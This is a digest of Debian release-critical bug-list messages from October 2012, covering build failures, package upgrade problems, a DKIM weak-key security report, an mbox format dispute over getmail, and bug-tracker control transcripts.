Bug#666334: gnustep-back: FTBFS: build-arch doesn't apply patches

2012-10-25 Thread Ralf Treinen
Hi,

On Wed, Oct 24, 2012 at 10:53:17PM +0200, Salvatore Bonaccorso wrote:

 @Yavor, so this still affects wheezy. I can try to help and provide a
 patch and/or do an NMU (time permitting), in case Ralf cannot do right
 now. Please let me know.

I won't have time in the next days for this so please go ahead. -Ralf.
-- 
Ralf Treinen
Laboratoire Preuves, Programmes et Systèmes
Université Paris Diderot, Paris, France.
http://www.pps.univ-paris-diderot.fr/~treinen/
= New email address: trei...@pps.univ-paris-diderot.fr =


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#676141: [request-tracker-maintainers] Bug#676141: rt4-extension-assettracker: fails to upgrade from wheezy: updating database schema for 1.2.4...command failed with code 2

2012-10-25 Thread Bradley Bell
I am unable to reproduce this problem any more


Bug#672030: Fwd: Re: Cannot build beast with gcc 4.7

2012-10-25 Thread Reinhard Tartler
On Thu, Oct 25, 2012 at 4:15 AM, Tim Janik tim.ja...@googlemail.com wrote:
 On 20.10.2012 12:42, Reinhard Tartler wrote:
 Hi Tim,

 I wonder if there is any news on this bug on your side?

 Beast 0.7.6 with full support for g++-4.7 has been released now, see our
 website: http://beast.testbit.eu/

 The full announcement is here:
   https://mail.gnome.org/archives/beast/2012-October/msg0.html

 Let me know if you have any further problems and thanks for your efforts.


Thanks for the new upstream release. Unfortunately, I notice that the
new release introduces quite a number of changes. Since the release
team insists on hand reviewing each line manually, they are likely to
reject a package that introduces a new release.

Any chance to isolate the g++-4.7 fixes? Is there a public gitweb
available somewhere so that we can apply them as patches to the old
version?


Thanks,
Reinhard


-- 
regards,
Reinhard


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#672030: Fwd: Re: Cannot build beast with gcc 4.7

2012-10-25 Thread Fabian Greffrath

Am 25.10.2012 08:43, schrieb Reinhard Tartler:

Any chance to isolate the g++-4.7 fixes? Is there a public gitweb
available somewhere so that we can apply them as patches to the old
version?


http://git.gnome.org/browse/beast/log/

I guess the first three commits of 2012-10-21 are relevant for g++-4.7.

 - Fabian


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#691394: opendkim: DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust

2012-10-25 Thread Thijs Kinkhorst
On Thu, October 25, 2012 07:18, Scott Kitterman wrote:
 Package: opendkim
 Version: 2.0.1+dfsg-1
 Severity: grave
 Tags: security upstream
 Justification: user security hole

 See http://www.kb.cert.org/vuls/id/268267, VU#268267

 opendkim in squeeze, wheezy, sid offers no method to prevent use of keys
 less than 1024 bits.  This is added in the new upstream release, 2.6.8,
 that
 was released just for this issue.

Thanks for your quick action on this. But is it really a user security
hole? The responsibility is with users not to use unsafe key sizes. GnuPG
works with small key sizes, I do not see that as a user security hole per
se.

Of course this proactive measure can help to prevent mistakes, so if
possible it would be good if we could still get this into wheezy.


Cheers,
Thijs


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: local mail spool still unaccessible with evo 3.4.4.-1

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 640851 serious
Bug #640851 [evolution] evolution: local mail files no longer accessible
Severity set to 'serious' from 'important'
 found 640851 3.4.3-1
Bug #640851 [evolution] evolution: local mail files no longer accessible
Marked as found in versions evolution/3.4.3-1.
 found 640851 3.4.4-1
Bug #640851 [evolution] evolution: local mail files no longer accessible
Marked as found in versions evolution/3.4.4-1.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
640851: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=640851
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#640851: local mail spool still unaccessible with evo 3.4.4.-1

2012-10-25 Thread Svante Signell
severity 640851 serious
found 640851 3.4.3-1
found 640851 3.4.4-1
thanks

I was waiting for the latest bugfix release to see if the local mailbox
spool problem was solved. Unfortunately it was not :( Local mails are
delivered to /var/mail/username and these are the settings used for
the local mail account in evo. However, evo looks for this mailbox file
at  ~/.local/share/evolution/mail/some_strange_directory_name
containing the following files: INBOX.ibex.index.data, INBOX.ibex.index,
INBOX.cmeta, folders.db

Removing these files and restarting evo does not help: evo complains
about: Summary and folder mismatch, even after a sync
In the settings the local account is flagged as of type spool and for
Receiving Email the setting is: Standard Unix mbox spool file.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#690150: marked as done (libphone-ui-dev: missing copyright file after upgrade from squeeze)

2012-10-25 Thread Debian Bug Tracking System
Your message dated Thu, 25 Oct 2012 11:17:29 +
with message-id e1trlrj-00046q...@franck.debian.org
and subject line Bug#690150: fixed in libphone-ui 1:0.0.1+git20110825-3
has caused the Debian Bug report #690150,
regarding libphone-ui-dev: missing copyright file after upgrade from squeeze
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
690150: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=690150
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: libphone-ui-dev
Version: 1:0.0.1+git20110825-2
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

A test with piuparts revealed that your package misses the copyright
file after an upgrade from squeeze to wheezy, which is a violation of
Policy 12.5 :
http://www.debian.org/doc/debian-policy/ch-docs.html#s-copyrightfile

After the upgrade /usr/share/doc/$package/ is just an empty directory.

Additional info may be available here:
http://wiki.debian.org/MissingCopyrightFile

There is something bad going on with the symlink to directory conversion
that is needed if the xmame-common or xmess-common package was
installed.

From the attached logfile (scroll to the bottom):

  MISSING COPYRIGHT FILE: /usr/share/doc/libphone-ui-dev/copyright
  drwxr-xr-x 2 root root 40 Oct 10 07:45 /usr/share/doc/libphone-ui-dev
  total 0
  drwxr-xr-x   2 root root   40 Oct 10 07:45 .
  drwxr-xr-x 136 root root 2960 Oct 10 07:45 ..


cheers,

Andreas


libphone-ui-dev_1:0.0.1+git20110825-2.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: libphone-ui
Source-Version: 1:0.0.1+git20110825-3

We believe that the bug you reported is fixed in the latest version of
libphone-ui, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 690...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sebastian Reichel s...@debian.org (supplier of updated libphone-ui package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Thu, 25 Oct 2012 13:04:18 +0200
Source: libphone-ui
Binary: libphone-ui-20110825 libphone-ui-20110825-dbg libphone-ui-common 
libphone-ui-dev
Architecture: source amd64 all
Version: 1:0.0.1+git20110825-3
Distribution: unstable
Urgency: low
Maintainer: Debian freesmartphone.org Team 
pkg-fso-ma...@lists.alioth.debian.org
Changed-By: Sebastian Reichel s...@debian.org
Description: 
 libphone-ui-20110825 - SHR library for user interface
 libphone-ui-20110825-dbg - SHR library for user interface (debug symbols)
 libphone-ui-common - SHR library for user interface (configuration files)
 libphone-ui-dev - SHR library for user interface (development files)
Closes: 690150
Changes: 
 libphone-ui (1:0.0.1+git20110825-3) unstable; urgency=low
 .
   [ Gregor Herrmann ]
   * Fix missing copyright file after upgrade from squeeze:
 change docdir in libphone-ui-dev.postinst from non-existant
 libphone-ui to libphone-ui-common (same as in debian/rules
 for new installs). (Closes: #690150)
Checksums-Sha1: 
 6fbade08f3ff7b4579607c551dc46bb0331ad273 2471 
libphone-ui_0.0.1+git20110825-3.dsc
 7029dc863cdba5bf09f4a4f8d1ead1d8a1deb555 5046 
libphone-ui_0.0.1+git20110825-3.debian.tar.gz
 957ecba7422c95632d926897661e7b5ee7bf6ca8 45850 
libphone-ui-20110825_0.0.1+git20110825-3_amd64.deb
 9245429c44b529ac6c02d84bf087a2c27cac888c 101844 
libphone-ui-20110825-dbg_0.0.1+git20110825-3_amd64.deb
 972751edf021ecbb674850b28d924e093047d48f 3990 
libphone-ui-common_0.0.1+git20110825-3_all.deb
 0690f5c1b685ea94c570becd6472a02550df9b25 6390 
libphone-ui-dev_0.0.1+git20110825-3_amd64.deb
Checksums-Sha256: 
 4adddb88b67da99b6f5a221d46cbdf7059b7579ca0c6196e18cd89ad37d068e8 2471 
libphone-ui_0.0.1+git20110825-3.dsc
 4cf98c81e75a1030a84c35f66e6d911b69eb8ab2bea681fa696a597b54383db0 5046 
libphone-ui_0.0.1+git20110825-3.debian.tar.gz
 193bd8b846b6efb0e0cafc1e22151f8410b0a7068aab2d7b5647ebb3b1de773e 45850 
libphone-ui-20110825_0.0.1+git20110825-3_amd64.deb
 10de1bd776624163efd7f5ca7c37df1580758e6c076c39693b7c9809d0a04cfc 101844 
libphone-ui-20110825-dbg_0.0.1+git20110825-3_amd64.deb
 29f5a57cc9310c2923f5abca319b0858a2f54517773f9f6a797736feaf6467c3 3990 

Bug#690142: Non english ordering of bind9_9.8.1.dfsg.P1-4.2.diff.gz ?

2012-10-25 Thread Jean-Michel Vourgère
Hello Nico

I'm trying to apply a patch to bind9 (see bug #690142).

But the diff.gz file I get is very different from previous version,
because files are not treated in the same order:

$ zgrep ^--- bind9_9.8.1.dfsg.P1-4.2.diff | head -3
--- bind9-9.8.1.dfsg.P1.orig/config.sub
--- bind9-9.8.1.dfsg.P1.orig/config.h.in
--- bind9-9.8.1.dfsg.P1.orig/configure

$ zgrep ^--- bind9_9.8.1.dfsg.P1-4.3.diff | head -3
--- bind9-9.8.1.dfsg.P1.orig/config.h.in
--- bind9-9.8.1.dfsg.P1.orig/configure
--- bind9-9.8.1.dfsg.P1.orig/configure.in

Do you have an idea why your diff file hasn't files ordered like mine?
Did you use a strange locale? Which one?


signature.asc
Description: This is a digitally signed message part.


Bug#690142: Non english ordering of bind9_9.8.1.dfsg.P1-4.2.diff.gz ?

2012-10-25 Thread Jean-Michel Vourgère
Ops, sorry. Forget it. Neither version is ordered.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#672030: Fwd: Re: Cannot build beast with gcc 4.7

2012-10-25 Thread Tim Janik
On 25.10.2012 08:43, Reinhard Tartler wrote:
 On Thu, Oct 25, 2012 at 4:15 AM, Tim Janik tim.ja...@googlemail.com wrote:
 On 20.10.2012 12:42, Reinhard Tartler wrote:
 Hi Tim,

 I wonder if there is any news on this bug on your side?
 Beast 0.7.6 with full support for g++-4.7 has been released now, see our
 website: http://beast.testbit.eu/

 The full announcement is here:
   https://mail.gnome.org/archives/beast/2012-October/msg0.html

 Let me know if you have any further problems and thanks for your efforts.

 Thanks for the new upstream release. Unfortunately, I notice that the
 new release introduces quite a number of changes. Since the release
 team insists on hand reviewing each line manually, they are likely to
 reject a package that introduces a new release.

 Any chance to isolate the g++-4.7 fixes? Is there a public gitweb
 available somewhere so that we can apply them as patches to the old
 version?

There has been a lot of C-C++ porting going on since the last release,
so hand reviewing would be quite hard.
Some fixes only went into the code base *after* the porting (such as the
davorgan.cc frequency fixes).

The code is of course public:
http://beast.testbit.eu/Beast_Download
git://git.gnome.org/beast
http://git.gnome.org/browse/beast

Here're commit IDs for the usual +#include unistd.h fixes you need for
gcc-4.7:
c17259d4b29dbc47a9657f172322d4d908fcd4cf
71ac19f78569f287f7e6db0147b6627a4d4acb0d

You'll also need the stack and member resolution fixes for gcc-4.7:
0bc5582c9d6ddeb23d236b2f55b59bf9b414a66a
7b63939eb6e22f3bf2a99719d8b8443236f4476c
fd03d7275711266e1350f7fb85c23b0996060fcd

However the latest release also includes important fixes for crashers
and GLib regressions, at least:
57b0bcbd03d2c7dac78f743fcafe1843cf07d87e
8ccc503bc6ee7a487c3d8834cf4ed028c537af52
545b1cd2ffb9d253aa81bff754b5b622a39fcfbb
2063dcbdc2238dccf877faed8371df9f682a536e
bfcdf52900b4fbd60139682dc62cedd8af210851
b62343a1d755a74bbb23c26ab1b90af44be92fa7

I have no idea how many conflicts you'll run into when backporting these
onto 0.7.4, because of the C-C++ porting we have done.

Best of luck.

 Thanks,
 Reinhard

-- 
Yours sincerely,
Tim Janik

---
http://timj.testbit.eu/ - Free software Author


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#627152: alsa-source: FTBFS

2012-10-25 Thread Jakub Wilk

  * Rename source package, make it 3.0 (native).
  * Drop alsa-source and all related packaging for alsa-modules. It was
painful to maintain, didn't make the kernel team happy at all and was
a general mess.


The old source package (alsa-driver) and the RC-buggy binary package 
(alsa-source) are still in unstable and wheezy:

| $ rmadison -S -s sid,wheezy alsa-driver
|  alsa-base| 1.0.23+dfsg-4 | sid   | all
|  alsa-base-udeb   | 1.0.23+dfsg-4 | sid/main/debian-installer | all
|  alsa-driver  | 1.0.23+dfsg-4 | wheezy| source
|  alsa-driver  | 1.0.23+dfsg-4 | sid   | source
|  alsa-source  | 1.0.23+dfsg-4 | wheezy| all
|  alsa-source  | 1.0.23+dfsg-4 | sid   | all
|  linux-sound-base | 1.0.23+dfsg-4 | wheezy| all
|  linux-sound-base | 1.0.23+dfsg-4 | sid   | all

Should they be removed?

--
Jakub Wilk


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#633799: getmail4: Mboxrd format is not supported

2012-10-25 Thread Osamu Aoki
Hi,

Problem is getmail documentation pretends it impliments mboxrd while it
actually use mboxo from python.  Mboxo may not be your favorite (nor
mine), but python decided to use mboxo with reason. python manual goes:

| 18.4.1.2. mbox
| ...
| Several variations of the mbox format exist to address perceived
| shortcomings in the original. In the interest of compatibility, mbox
| implements the original format, which is sometimes referred to as mboxo.
| This means that the Content-Length header, if present, is ignored and
| that any occurrences of “From ” at the beginning of a line in a message
| body are transformed to “From ” when storing the message, although
| occurrences of “From ” are not transformed to “From ” when reading the
| message.

On Wed, Oct 24, 2012 at 03:29:26AM +0200, Christoph Anton Mitterer wrote:
 severity 633799 critical
 forwarded 633799 http://article.gmane.org/gmane.mail.getmail.user/4576
 stop

 Osamu, I can't believe my eyes why you severity-normal-ised such an
 issue, if you'd not... I (and others) would have had the chance to see
 it e.g. via apt-listbugs.

Thank you for your attention and success in making upstream accept patch
to realize mboxrd format instead of mboxo.  (Have you read entire bug
report including patches.)

But if you read history of bug report including patches, you could have
written a bit kinder tone message.  I feel a bit sad to see this message.

Maybe I should have applied my documentation patch in BTS.  But since
upstream did not take this patch, I left it here.

 Before I saw this bug at Debian, I reported the same issue again
 upstream:
 http://article.gmane.org/gmane.mail.getmail.user/4576
 which does of course not mean that now they're smarter.
 
 
 But from Debian side this clearly needs to be handled better. What I
 suggested at the Debian bug on the analogous Evolution issue is:
 big fat warnings in:
 - the NEWS file

No. This is not news.  So not an appropriate place.

Right place should be more like README.Debian or BUGS.

 - the package descripting

This is not right place.

 - if possibly in a priority-high dialogue via debconf

This is not right place per policy.

 If upstream is stupid and doesn't want to fix this, then we really

Please do not call upstream stupid ... especially in public like this.
I think you are bright but this is not very polite.

 really must warn our users on that issue.
 And even if upstream would fix it, we still would need to warn our users
 at least in the NEWS file / release notes... that all their mail from
 previous years is likely corrupted.

mboxo has been always so and have been widely used.
mboxrd is technically superior.

anyone who stores file in mbox should know there are risks as you
describe.

 For the above reasons, reseting the severity again to critical, as it
 causes serious (because irrecoverable) data loss.

I think important point is not above reason only but the fact upstream
applied patch to make this program to function as mboxrd.

I think you are a bit exxagurating severity of trivial part of data
change.

 If you don't want to apply the solving patch in only debian (if upstream
 rejects it) I'd be fined with closing this bug (as wontfix) if the above
 warnings (NEWS file, package description, debconf dialogue) are
 installed.
 
 Again, I need to point out that I'm really disturbed and sad that such a
 bug got hidden away in Debian :(

Yah, I had homework to update README.Debian.

Let's ask release manager how this should be handled now.

If they are OK to accept patch only to fix this bug (inconsistence
between documentation and code.) causing mbox file to be not the most
technically safe one.

Regards,

Osamu


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 3 errors): Re: Bug#674174: gnome-dvb-client fails to execute: __init__() got an unexpected keyword argument 'icon_widget'

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # To unmark gnome-dvb-client as RC-buggy in wheezy/sid:
 reassign 674174 src:pygobject
Bug #674174 {Done: Sebastian Reichel s...@debian.org} [gnome-dvb-client] 
gnome-dvb-client fails to execute: __init__() got an unexpected keyword 
argument 'icon_widget'
Bug reassigned from package 'gnome-dvb-client' to 'src:pygobject'.
No longer marked as found in versions gnome-dvb-daemon/1:0.2.8-1.
No longer marked as fixed in versions gnome-dvb-daemon/1:0.2.9-1.
 # Merging with existing bug:
 tags 674174 = fixed-upstream upstream
Bug #674174 {Done: Sebastian Reichel s...@debian.org} [src:pygobject] 
gnome-dvb-client fails to execute: __init__() got an unexpected keyword 
argument 'icon_widget'
Added tag(s) upstream and fixed-upstream.
 found 674174 pygobject/3.2.0-2
Bug #674174 {Done: Sebastian Reichel s...@debian.org} [src:pygobject] 
gnome-dvb-client fails to execute: __init__() got an unexpected keyword 
argument 'icon_widget'
Marked as found in versions pygobject/3.2.0-2 and reopened.
 fixed 674174 pygobject/3.2.1-1
Bug #674174 [src:pygobject] gnome-dvb-client fails to execute: __init__() got 
an unexpected keyword argument 'icon_widget'
Marked as fixed in versions pygobject/3.2.1-1.
 unarchive 667057
Bug #667057 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client: gnome-dvb-control crashed: TypeError: __init__() got an 
unexpected keyword argument 'icon_widget'
Bug #673666 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client regression: gnome-dvb-control fails to start
Unarchived Bug 667057
Unarchived Bug 673666
 merge 674174 667057
Bug #674174 [src:pygobject] gnome-dvb-client fails to execute: __init__() got 
an unexpected keyword argument 'icon_widget'
Unable to merge bugs because:
severity of #667057 is 'normal' not 'grave'
done of #667057 is 'Martin Pitt mp...@debian.org' not ''
affects of #667057 is 'gnome-dvb-client' not ''
package of #667057 is 'python-gobject' not 'src:pygobject'
severity of #673666 is 'normal' not 'grave'
done of #673666 is 'Martin Pitt mp...@debian.org' not ''
affects of #673666 is 'gnome-dvb-client' not ''
package of #673666 is 'python-gobject' not 'src:pygobject'
Failed to merge 674174: Did not alter merged bugs
Debbugs::Control::set_merged('transcript', 'GLOB(0x31e53f8)', 
'requester', 'Steven Chamberlain ste...@pyro.eu.org', 'request_addr', 
'cont...@bugs.debian.org', 'request_msgid', '508931b6.8080...@pyro.eu.org', 
'request_subject', ...) called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 537
eval {...} called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 536
Debbugs::Control::Service::control_line('line', 'merge 674174 667057', 
'clonebugs', 'HASH(0x315e3f8)', 'limit', 'HASH(0x315d8d8)', 
'common_control_options', 'ARRAY(0x315d920)', 'errors', ...) called at 
/usr/lib/debbugs/service line 474

 # Note that this affected gnome-dvb-client:
 affects 674174 + gnome-dvb-client
Failed to mark 674174 as affecting package(s): failed to get lock on 
/org/bugs.debian.org/spool/lock/674174 -- Unable to lock 
/org/bugs.debian.org/spool/lock/674174 Resource temporarily unavailable.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583.
Unable to lock /org/bugs.debian.org/spool/lock/674174 Resource temporarily 
unavailable at /usr/local/lib/site_perl/Debbugs/Common.pm line 583. at 
/usr/local/lib/site_perl/Debbugs/Common.pm line 601
Debbugs::Common::filelock('/org/bugs.debian.org/spool/lock/674174') 
called at /usr/local/lib/site_perl/Debbugs/Status.pm line 210
Debbugs::Status::read_bug('bug', 674174, 'lock', 1) called at 
/usr/local/lib/site_perl/Debbugs/Status.pm line 462
Debbugs::Status::lock_read_all_merged_bugs('bug', 674174) called at 
/usr/local/lib/site_perl/Debbugs/Control.pm line 3654
Debbugs::Control::__begin_control('remove', 0, 

Processed: Re: Bug#688689: ncbi-blast+: trying to overwrite '/usr/bin/seedtop', which is also in package blast2 1:2.2.26.20120620-2

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # Need to identify the fixed *source* package here I think
 notfixed 688689 blast2/1:2.2.26.20120620-2
Bug #688689 {Done: u...@debian.org (Aaron M. Ucko)} [blast2] ncbi-blast+: 
trying to overwrite '/usr/bin/seedtop', which is also in package blast2 
1:2.2.26.20120620-2
The source blast2 and version 1:2.2.26.20120620-2 do not appear to match any 
binary packages
No longer marked as fixed in versions blast2/1:2.2.26.20120620-2.
 # Source for blast2 is src:ncbi-tools6
 fixed 688689 ncbi-tools6/1:2.2.26.20120620-2
Bug #688689 {Done: u...@debian.org (Aaron M. Ucko)} [blast2] ncbi-blast+: 
trying to overwrite '/usr/bin/seedtop', which is also in package blast2 
1:2.2.26.20120620-2
The source ncbi-tools6 and version 1:2.2.26.20120620-2 do not appear to match 
any binary packages
Marked as fixed in versions ncbi-tools6/1:2.2.26.20120620-2.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
688689: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688689
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#681227: installation-reports: grub-install tries to install to a nonsense string

2012-10-25 Thread willem kuyn
Hi,

I tried to reproduce the bug in different settings.
- A virtual machine installation: grub always writes to /dev/sda
- A new lenova laptop booting from dvd: grub writes to /dev/sda
- Installation on an external usb disk: grub writes to /dev/sda
This is the original disk in the machine, while it was my
expectation that grub should write to the MBR of usb disk.
Booting from the usb disk is not possible only via /dev/sda.

The question is:
What is the configuration where grub writes to the MBR of /dev/sdb?

Willem


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#674174: gnome-dvb-client fails to execute: __init__() got an unexpected keyword argument 'icon_widget'

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 affects 674174 gnome-dvb-client
Bug #674174 [src:pygobject] gnome-dvb-client fails to execute: __init__() got 
an unexpected keyword argument 'icon_widget'
Added indication that 674174 affects gnome-dvb-client
 reassign 674174 python-gobject
Bug #674174 [src:pygobject] gnome-dvb-client fails to execute: __init__() got 
an unexpected keyword argument 'icon_widget'
Bug reassigned from package 'src:pygobject' to 'python-gobject'.
No longer marked as found in versions pygobject/3.2.0-2.
No longer marked as fixed in versions pygobject/3.2.1-1.
 severity 667057 grave
Bug #667057 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client: gnome-dvb-control crashed: TypeError: __init__() got an 
unexpected keyword argument 'icon_widget'
Bug #673666 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client regression: gnome-dvb-control fails to start
Severity set to 'grave' from 'normal'
Severity set to 'grave' from 'normal'
 forcemerge 667057 674174
Bug #667057 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client: gnome-dvb-control crashed: TypeError: __init__() got an 
unexpected keyword argument 'icon_widget'
Bug #673666 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client regression: gnome-dvb-control fails to start
Bug #674174 [python-gobject] gnome-dvb-client fails to execute: __init__() got 
an unexpected keyword argument 'icon_widget'
Marked Bug as done
Marked as fixed in versions pygobject/3.2.1-1.
Marked as found in versions pygobject/3.2.0-2.
Bug #673666 {Done: Martin Pitt mp...@debian.org} [python-gobject] 
gnome-dvb-client regression: gnome-dvb-control fails to start
Merged 667057 673666 674174
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
667057: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=667057
673666: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=673666
674174: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=674174
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#690373: Ping: gdcm: incomplete copyright file (#690373)

2012-10-25 Thread Andreas Tille
Hi Mathieu,

I pinged you two days ago but did not got any answer.  If I do not hear
from you I'll take action at this weekend, latest next Monday.

Kind regards

Andreas.

On Tue, Oct 23, 2012 at 04:55:04PM +0200, Andreas Tille wrote:
 Hi Mathieu,
 
 just a ping about this bug which seems to be easy to fix but is relevant
 for the release.  Please let me know if I should step in in case you
 feel not able to upload for whatever reason.
 
 Kind regards
 
Andreas.

-- 
http://fam-tille.de


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#688689: ncbi-blast+: trying to overwrite '/usr/bin/seedtop', which is also in package blast2 1:2.2.26.20120620-2

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # Oops, I'll try to get it right this time:
 notfixed 688689 ncbi-tools6/1:2.2.26.20120620-2
Bug #688689 {Done: u...@debian.org (Aaron M. Ucko)} [blast2] ncbi-blast+: 
trying to overwrite '/usr/bin/seedtop', which is also in package blast2 
1:2.2.26.20120620-2
The source ncbi-tools6 and version 1:2.2.26.20120620-2 do not appear to match 
any binary packages
No longer marked as fixed in versions ncbi-tools6/1:2.2.26.20120620-2.
 fixed 688689 ncbi-tools6/6.1.20120620-2
Bug #688689 {Done: u...@debian.org (Aaron M. Ucko)} [blast2] ncbi-blast+: 
trying to overwrite '/usr/bin/seedtop', which is also in package blast2 
1:2.2.26.20120620-2
Marked as fixed in versions ncbi-tools6/6.1.20120620-2.
 # This tell version tracking the RC bug is fixed in wheezy+sid
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
688689: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688689
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed (with 2 errors): Re: Bug#688689: ncbi-blast+: trying to overwrite '/usr/bin/seedtop', which is also in package blast2 1:2.2.26.20120620-2

2012-10-25 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 # Actually...
 forcemerge 688684 688689
Bug #688684 {Done: Olivier Sallou osal...@debian.org} [ncbi-blast+] 
ncbi-blast+: trying to overwrite '/usr/bin/seedtop', which is also in package 
blast2 1:2.2.26.20120620-2
Unable to merge bugs because:
package of #688689 is 'blast2' not 'ncbi-blast+'
Failed to forcibly merge 688684: Did not alter merged bugs
Debbugs::Control::set_merged('transcript', 'GLOB(0x310b170)', 
'requester', 'Steven Chamberlain ste...@pyro.eu.org', 'request_addr', 
'cont...@bugs.debian.org', 'request_msgid', '5089362a.7010...@pyro.eu.org', 
'request_subject', ...) called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 551
eval {...} called at 
/usr/local/lib/site_perl/Debbugs/Control/Service.pm line 550
Debbugs::Control::Service::control_line('line', undef, 'clonebugs', 
'HASH(0x307f3f8)', 'limit', 'HASH(0x307e8d8)', 'common_control_options', 
'ARRAY(0x307e920)', 'errors', ...) called at /usr/lib/debbugs/service line 474

 done

End of message, stopping processing here.

Please contact me if you need assistance.
-- 
688684: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688684
688689: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=688689
Debian Bug Tracking System
